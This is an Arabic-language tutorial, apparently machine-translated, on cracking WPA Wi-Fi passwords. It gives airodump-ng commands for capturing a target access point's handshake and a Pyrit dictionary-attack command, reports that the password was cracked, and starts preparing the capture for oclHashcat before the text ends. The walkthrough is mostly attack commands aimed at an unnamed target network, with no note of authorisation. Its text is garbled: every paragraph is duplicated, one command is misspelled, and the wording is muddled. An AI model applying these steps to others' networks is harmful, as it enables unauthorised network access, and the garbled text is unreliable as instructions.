طرق للقضاء على Wifi باستخدام Pyrit و oclHashcat و Cowpatty
قم أولاً ببدء وضع الشاشة على محولنا اللاسلكي.
قم أولاً ببدء وضع الشاشة على محولنا اللاسلكي.
الآن يتم تمكين وضع الشاشة مع اسم wlan0mon.
ثم مع الأمر التالي ، ابدأ في الاستماع إلى جميع اتصالات wifi المتاحة:
airodump-ng wlan0mon
ثم مع الأمر التالي ، ابدأ في الاستماع إلى جميع اتصالات wifi المتاحة:
airodump-ng wlan0mon
بعد تشغيل الأمر أعلاه ، سيبدأ الاستماع لكل حركة مرور wifi القريبة ، لذا انتظر حتى يظهر هدفك ، ثم اضغط على ctrl ^ c.
الآن علينا أن نستمع إلى قناة محددة يوجد عليها الهدف. الآن قم بتشغيل الأمر:
irodump-ng -c 2 –bssid 3C:1E:04:XX:XX:XX –write sommay wlan0mon
-c == رقم قناة الهدف (2 في حالتي ، راجع العمود CH)
–bssid == عنوان MAC للهدف AP
- write == اسم ملف الالتقاط
الآن علينا أن نستمع إلى قناة محددة يوجد عليها الهدف. الآن قم بتشغيل الأمر:
irodump-ng -c 2 –bssid 3C:1E:04:XX:XX:XX –write sommay wlan0mon
-c == رقم قناة الهدف (2 في حالتي ، راجع العمود CH)
–bssid == عنوان MAC للهدف AP
- write == اسم ملف الالتقاط
انتظر الآن حتى يتم التقاط مصافحة WPA ثم اضغط على crtl ^ c.
سيتم الآن إنشاء ملف باسم sommay-01.cap
سيتم الآن إنشاء ملف باسم sommay-01.cap
PYRIT
الطريقة الأولى للقضاء على كلمة المرور من ملف الالتقاط هي PYRIT. سوف نستخدم القاموس الهجوم حتى تشغيل الأمر:
pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough
-i ==
المسار إلى ملف الإدخال في حالتنا هو المسار إلى القاموس
-r ==
المسار إلى الأسطول الذي تم (في حالتنا يكون sommay-01.cap)
attack_passthrough ==
هذه الخيارات هي تحديد أن هجوم القاموس يجب تنفيذه
كما ترون فقد نجحت في كسر كلمة المرور.
الطريقة الأولى للقضاء على كلمة المرور من ملف الالتقاط هي PYRIT. سوف نستخدم القاموس الهجوم حتى تشغيل الأمر:
pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough
-i ==
المسار إلى ملف الإدخال في حالتنا هو المسار إلى القاموس
-r ==
المسار إلى الأسطول الذي تم (في حالتنا يكون sommay-01.cap)
attack_passthrough ==
هذه الخيارات هي تحديد أن هجوم القاموس يجب تنفيذه
كما ترون فقد نجحت في كسر كلمة المرور.
OCLHASHCAT
بادئ ذي بدء ، قم بتنزيل oclhashcat
من موقعه الرسمي: https://hashcat.net/files/hashcat-2.00.7z
أولاً يتعين علينا تحويل ملف .cap الذي تم التقاطه باستخدام airodump-ng مسبقًا إلى .hccap with aircrack-ng حسب الأمر:
aircrack-ng sommay-01.cap -J sommay-01
-J ==
المسار إلى ملف الإخراج مع التمديد .hccap
بادئ ذي بدء ، قم بتنزيل oclhashcat
من موقعه الرسمي: https://hashcat.net/files/hashcat-2.00.7z
أولاً يتعين علينا تحويل ملف .cap الذي تم التقاطه باستخدام airodump-ng مسبقًا إلى .hccap with aircrack-ng حسب الأمر:
aircrack-ng sommay-01.cap -J sommay-01
-J ==
المسار إلى ملف الإخراج مع التمديد .hccap